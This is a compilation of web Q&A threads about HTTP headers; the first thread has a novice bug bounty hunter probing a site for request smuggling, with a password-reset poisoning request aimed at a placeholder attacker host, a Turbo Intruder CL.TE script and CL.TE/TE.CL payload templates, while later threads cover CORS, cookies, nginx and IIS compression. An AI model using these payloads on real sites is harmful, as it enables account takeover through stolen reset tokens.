I'm a bug bounty hunter, and I'm new to it. A few days ago I read about the request smuggling vulnerability, and right after that I started hunting for it on the Internet. Yesterday I found a website where adding X-Forwarded-Host: google.com to the request headers redirects me to https://www.google.com. That alone is very hard to exploit, so I thought about combining it with request smuggling. I chose the password-reset request as the target:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1

email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
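From what I've read, the classic standalone use of this header is password-reset poisoning: if the application builds the reset link from X-Forwarded-Host, adding the header to this request makes the emailed link point at a host the attacker controls. A sketch (attacker.example is a placeholder, and I haven't confirmed the app builds its links from this header):

POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
X-Forwarded-Host: attacker.example
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

email=victim%40gmail.com

If the victim clicks the link in the resulting email, the reset token lands on attacker.example.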
I converted the original request to chunked encoding:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
But when I sent it, I got a 503 "client read error" response, so it looks like the server doesn't accept chunked encoding. Still, I wanted to continue, so I installed the HTTP Request Smuggler and Turbo Intruder extensions in Burp Suite and ran a Smuggle attack (CL.TE). It generated this smuggle-attack Python code:
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
Then I ran it with Turbo Intruder, and I was very surprised: of the 14 requests it sent, 12 came back 503 and the remaining 2 came back 200. Notably, the 200 response headers contained ...transfer-encoding: chunked.... I tried a few more times and got the same result: one or two requests return 200. But something is strange here: in the code the prefix is ...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''.... After a few tests I don't think this is a request smuggling bug, because the 200 responses clearly belong to the original request, not to the prefix in the code (I tried changing the prefix too, and I still get 200 rather than the 400, 404, etc. that I expected).
So, does anyone (it probably takes a very professional hacker) know what vulnerability I'm facing? Thank you!
First of all, your first converted request is chunked in the TE.CL style, but after using the Burp extension you found a CL.TE issue, so the problem may be there.
As for the responses, you seem a bit confused. I recommend working through the PortSwigger HTTP request smuggling labs; I completed them recently, and they will make your fundamentals pretty strong!
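To make the distinction concrete, here is a minimal sketch of the two desync shapes (host, path, and lengths are placeholders, not taken from your target). In CL.TE, the front end trusts Content-Length and forwards everything, while the back end trusts Transfer-Encoding, stops at the 0 chunk, and treats the rest as the start of the next request:

POST / HTTP/1.1
Host: vulnerable.example
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

In TE.CL, the roles are reversed: the front end trusts Transfer-Encoding and forwards the whole chunked body, while the back end trusts Content-Length (here 3, covering only the "8" line) and leaves the rest on the connection:

POST / HTTP/1.1
Host: vulnerable.example
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0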
I'm trying to run a web application that I've built in an iframe on another domain. I'm able to load the page within the iframe, but any ajax requests on the page result in a 403 error as per below:
General:
Request URL: https://test.mydomain.com/get_extra_services/
Request Method: POST
Status Code: 403 Forbidden
Remote Address: 207.38.86.14:443
Referrer Policy: no-referrer-when-downgrade
Response headers:
Connection: keep-alive
Content-Length: 1382
Content-Type: text/html
Date: Thu, 18 Jun 2020 22:57:41 GMT
Server: nginx
X-Content-Type-Options: nosniff
Request headers:
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 22
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: _ga=GA1.2.2146753382.1592180975; _gid=GA1.2.1219012919.1592286837
DNT: 1
Host: test.mydomain.com
Origin: https://test.mydomain.com
Referer: https://test.mydomain.com/order/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
X-CSRFToken: null
X-Requested-With: XMLHttpRequest
Form data:
serviceid: 18
checked: 1
Any thoughts on what is causing this error?
Thanks!
You need to set up CORS to make requests from a different domain.
https://enable-cors.org/
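For example, if the backend were Node/Express, a minimal sketch using the cors package would look like this (your stack appears to be nginx-fronted, so this is purely illustrative; the origin and route are placeholders):

// npm install express cors
const express = require('express');
const cors = require('cors');

const app = express();

// Allow the page embedding the iframe to call this API with cookies.
app.use(cors({
  origin: 'https://embedding-site.example', // placeholder for the iframe's host page
  credentials: true,
}));

// Placeholder route standing in for the real endpoint
app.post('/get_extra_services/', (req, res) => res.json({ ok: true }));

app.listen(3000);

That said, the captured request shows Sec-Fetch-Site: same-origin and X-CSRFToken: null, so it may also be worth checking whether a server-side CSRF check is what is rejecting the request.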
I am running a React (16) web app (deployed on Netlify) that is failing with one of its API calls being blocked by CORS, but only in Safari. There's no problem in Chrome or Firefox. The console shows the following:
Origin https://chicha.netlify.app is not allowed by Access-Control-Allow-Origin.
XMLHttpRequest cannot load https://chicha-api.herokuapp.com/votes due to access control checks.
Failed to load resource: Origin https://chicha.netlify.app is not allowed by Access-Control-Allow-Origin.
Headers of the blocked request (Safari):
Summary
URL: https://chicha-api.herokuapp.com/votes
Status: —
Source: —
Initiator:
xhr.js:178
Request
Accept: application/json, text/plain, */*
Origin: https://chicha.netlify.app
Referer: https://chicha.netlify.app/events
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Response
No response headers
Here are the headers of the same request that is not blocked (Chrome):
General:
Request URL: https://chicha-api.herokuapp.com/votes
Request Method: OPTIONS
Status Code: 204 No Content
Remote Address: 52.214.138.78:443
Referrer Policy: no-referrer-when-downgrade
Response headers:
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: x-requested-with
Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
Access-Control-Allow-Origin: https://chicha.netlify.app
Connection: keep-alive
Content-Length: 0
Date: Wed, 03 Jun 2020 10:43:59 GMT
Server: Cowboy
Vary: Origin, Access-Control-Request-Headers
Via: 1.1 vegur
X-Powered-By: Express
Request headers:
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,es;q=0.9,ca;q=0.8,fr;q=0.7
Access-Control-Request-Headers: x-requested-with
Access-Control-Request-Method: GET
Connection: keep-alive
Host: chicha-api.herokuapp.com
Origin: https://chicha.netlify.app
Referer: https://chicha.netlify.app/events
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
The app makes the call with axios configured as follows:
class ApiClient {
  constructor() {
    this.apiClient = axios.create({
      baseURL: process.env.REACT_APP_BACKEND_URI,
      withCredentials: true,
      headers: { 'X-Requested-With': 'XMLHttpRequest' },
    });
  }

  getVotes = () => this.apiClient.get('/votes');
  getEvents = () => this.apiClient.get('/events');
  ...
The API (Node.js with Express deployed on Heroku) has the following CORS configuration:
app.use(
  cors({
    credentials: true,
    origin: [process.env.FRONTEND_DOMAIN],
  })
);
... where FRONTEND_DOMAIN is https://chicha.netlify.app in environment config vars on Heroku.
What's strange is other API requests have no issue. API headers of a successful request (Safari):
Summary
URL: https://chicha-api.herokuapp.com/events
Status: 304 Not Modified
Source: Memory Cache
Address: 52.215.119.172:443
Initiator:
xhr.js:178
Request
GET /events HTTP/1.1
Accept: application/json, text/plain, */*
Origin: https://chicha.netlify.app
Accept-Language: en-gb
If-None-Match: W/"c010-APRvUYTowK2az7ovB1dPcY+SGuk"
Host: chicha-api.herokuapp.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Referer: https://chicha.netlify.app/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Response
HTTP/1.1 304 Not Modified
Connection: keep-alive
Access-Control-Allow-Credentials: true
ETag: W/"c010-APRvUYTowK2az7ovB1dPcY+SGuk"
Date: Wed, 03 Jun 2020 10:26:18 GMT
Via: 1.1 vegur
Access-Control-Allow-Origin: https://chicha.netlify.app
Content-Length: 0
Vary: Origin
Server: Cowboy
X-Powered-By: Express
Does the fact that the blocked request has a referrer which is distinct from origin matter? Or perhaps some issue with the cookie not being sent with the request (despite the withCredentials configuration in axios)?
EDIT (4 Jun 2020): I've been able to replicate this on localhost, so I'm editing to indicate it's just an issue in Safari. Given related questions and some testing I believe this has to do with the allowedHeaders / CORS Access-Control-Allow-Headers configuration and maybe the way Safari configures OPTIONS preflight request. I haven't been able to see all the request details even configuring Reactotron and apisauce.
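For reference, the kind of change I was considering (allowedHeaders maps to Access-Control-Allow-Headers in the cors package; this particular header list is a guess on my part, not a confirmed fix):

app.use(
  cors({
    credentials: true,
    origin: [process.env.FRONTEND_DOMAIN],
    allowedHeaders: ['X-Requested-With', 'Content-Type'],
  })
);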
EDIT (7 Jun 2020): I've noticed cookies aren't being set in Safari, so the currentUser I set in Express on the server side is not persisting (in req.session.currentUser, where I set it after login). Also, while I was able to produce the error at one point on localhost, I can't reliably replicate it locally.
It turns out Safari was blocking the cookie sent from my API as a result of the "Prevent cross-site tracking" option in Safari's privacy settings. Disabling this option makes everything work perfectly.
So it seems the only workaround is to place the API on the same domain as the web app, or to use a proxy, as referenced in this question and answer:
Is there a workaround for Safari iOS "Prevent Cross Site Tracking" option, when issuing cookies from API on different domain?
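For anyone taking the proxy route, a sketch of one common setup using Express with http-proxy-middleware (the mount path, port, and build directory are placeholders; any reverse proxy that serves the app and the API from one origin works the same way):

// npm install express http-proxy-middleware
const express = require('express');
const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

// Forward /api/* to the Heroku API so its cookies become first-party
app.use('/api', createProxyMiddleware({
  target: 'https://chicha-api.herokuapp.com',
  changeOrigin: true,
  pathRewrite: { '^/api': '' },
}));

// Serve the built React app from the same origin
app.use(express.static('build'));

app.listen(3000);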
EDIT: The following answer only applies to localhost development, not for when this issue also happens on a remote server. It's a temporary solution in development mode.
Well, if someone else finds this question, there's an easy fix in Safari. First, make sure you have your Develop menu in the menu bar by going to "Safari" -> "Settings" and in the tab "Advanced" select the option "Show Develop menu in menu bar". Once this is done, you should see the Develop menu. Now, select "Develop" -> "Disable Cross-Origin Restrictions".
[Screenshot: "Disable Cross-Origin Restrictions" in the Develop menu]
I'm trying to use the net module in nodejs to send a POST request while connecting to a socket.
I've tried sending a GET request which indeed does work, but I can't seem to get the POST request to work.
This is the code:
socket.write(`POST /page.php HTTP/1.1\r\n
Host: domain.com\r\n
Connection: close\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\n
User-Agent: Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13\r\n
Upgrade-Insecure-Requests: 1\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.9\r\n
Cache-Control: max-age=0\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 0\r\n\r\n`);
I've "debugged" it, and I've noticed some 301 Moved Permanently and Temporarily redirected responses from the host.
I've set up a simple website with a valid Let's Encrypt SSL certificate (from certbot). My nginx config is very short and trivial.
The website shows up correctly in the latest Firefox: it shows a 404 page, which is OK to me and works as expected.
If I try Google Chrome, I get an error:
The webpage at https://example.org/ might be temporarily down or it
may have moved permanently to a new web address.
ERR_INVALID_SIGNED_EXCHANGE
I assume that the application/signed-exchange value may be causing this.
What is it, and should I remove it from the response?
Request
GET / HTTP/1.1
Host: example.org
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,ru;q=0.8
DNT: 1
Response
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 29 Mar 2019 12:05:49 GMT
Content-Type: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Content-Length: 345
Connection: keep-alive
What to fix?
The Content-Type in the response is incorrect. It should be a single type, as Steffen Ullrich said. For a 404 page, I suspect you want Content-Type: text/html.
This may be something particular to your nginx config. On my server, 404 pages have Content-Type: text/html.
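If it helps, a hypothetical nginx fragment along those lines (paths are placeholders):

error_page 404 /404.html;

location = /404.html {
    default_type text/html;
    internal;
}

And if the browser's Accept string was pasted into a default_type or add_header Content-Type directive somewhere in the config, removing it should restore the normal text/html response.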
I have a Server 2012 R2 box running IIS. I've tried enabling compression for several sites running on that box, but I can't figure out why it won't work. My request headers all show accept-encoding, but the response headers are always Transfer-Encoding:chunked and Vary:Accept-Encoding. The following steps have been performed to try to get gzip compression working:
Dynamic and Static compression have been enabled on each site and at the machine level
Both compression methods are installed from Server Manager
The httpCompression and urlCompression nodes have been manually added to web.configs (see the sketch after this list)
Mime types are defined for compression
frequentHitThreshold has been set to 1, so all content should be compressed after the first attempt to access it
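For reference, a minimal sketch of those web.config nodes (the MIME types are placeholders; note that IIS locks the httpCompression section to applicationHost.config by default, so it may be silently ignored in a site-level web.config unless the section is unlocked):

<system.webServer>
  <urlCompression doStaticCompression="true" doDynamicCompression="true" />
  <httpCompression>
    <dynamicTypes>
      <add mimeType="text/html" enabled="true" />
      <add mimeType="application/json" enabled="true" />
    </dynamicTypes>
    <staticTypes>
      <add mimeType="text/css" enabled="true" />
      <add mimeType="application/javascript" enabled="true" />
    </staticTypes>
  </httpCompression>
</system.webServer>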
A trace has been done to see why compression isn't occurring. The only information I have is the code DYNAMIC_COMPRESSION_NOT_SUCCESS with a reason of 1.
Here are the headers:
GET http://redactedservername:8082/ HTTP/1.1
Host: redactedservername:8082
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: ASP.NET_SessionId=gnqovt55ggt22lycufudc0ns
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 22 Jun 2016 14:00:57 GMT
Transfer-Encoding: chunked
What other steps can be performed to get compression to work?
Compression was working, but ESET Antivirus was doing its job of monitoring web traffic. This modified the response, so I didn't get gzip content encoding as expected. Disabling ESET and testing again showed that compression was functioning.